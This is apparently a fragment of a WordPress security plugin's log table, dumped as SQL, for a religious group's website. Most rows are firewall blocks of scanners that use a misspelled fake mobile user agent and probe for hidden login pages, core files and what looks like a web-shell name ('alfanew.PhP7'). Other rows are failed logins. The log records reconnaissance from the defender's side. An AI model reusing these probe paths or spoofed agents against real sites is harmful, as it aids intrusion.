User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134779,1700247618.069719,1700247618.057100,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134770,1700247417.664469,1700247417.655600,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134771,1700247405.193716,1700247405.184700,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/certificates/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NlcnRpZmljYXRlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134787,1700269530.823346,1700269530.791100,0x00000000000000000000FFFFD9A03CA2,0,403,0,0,0,'https://eckankar-colorado.org/alfanew.PhP7','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFuZXcuUGhQNw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134778,1700247598.607514,1700247598.598400,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/images/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134772,1700247466.502773,1700247466.481100,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134788,0.000000,1700271116.853396,0x00000000000000000000FFFF5762ADFC,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134773,1700247503.120732,1700247503.099000,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134777,1700247574.023071,1700247574.012200,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134774,1700247483.936045,1700247483.913800,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133586,1699888545.032348,1699888545.023600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/nav-menu.php','http://eckankar-colorado.org/wp-includes/nav-menu.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL25hdi1tZW51LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133585,1699888545.397182,1699888545.387700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/option.php','http://eckankar-colorado.org/wp-includes/option.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL29wdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133234,1699888683.233925,1699888683.225200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/home/','http://eckankar-colorado.org/wp-content/plugins/home/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ob21lLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133435,1699888603.223846,1699888603.215200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-rss.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-rss.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133265,1699888669.599838,1699888669.590700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v1.php','http://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v1.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmlkM3YxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133266,1699888669.267378,1699888669.258700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.apetag.php','http://eckankar-colorado.org/wp-includes/ID3/module.tag.apetag.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmFwZXRhZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133269,1699888668.272917,1699888668.264200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.flac.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio.flac.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uZmxhYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133267,1699888668.935435,1699888668.926700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.ogg.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio.ogg.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8ub2dnLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134686,0.000000,1700173098.746002,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134687,0.000000,1700173801.600236,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134688,0.000000,1700174490.817346,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134689,0.000000,1700175161.684857,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134678,1700171260.929137,1700171260.907300,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/background.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JhY2tncm91bmQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134690,0.000000,1700175835.870745,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134691,0.000000,1700176500.198009,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134692,0.000000,1700177167.510397,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134693,0.000000,1700177838.952688,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134694,0.000000,1700177920.576643,0x00000000000000000000FFFF4C8278C6,0,200,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginFailValidUsername',NULL,NULL),(133331,1699888642.718278,1699888642.696600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/network.php','http://eckankar-colorado.org/wp-admin/includes/network.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL25ldHdvcmsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133330,1699888643.049887,1699888643.040900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/noop.php','http://eckankar-colorado.org/wp-admin/includes/noop.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL25vb3AucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133340,1699888639.701312,1699888639.692400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/list-table.php','http://eckankar-colorado.org/wp-admin/includes/list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2xpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133342,1699888638.905904,1699888638.896400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/image.php','http://eckankar-colorado.org/wp-admin/includes/image.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2ltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133528,1699888567.000370,1699888566.991600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-error.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-error.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItZXJyb3IucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133529,1699888566.658317,1699888566.649700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-date.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-date.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 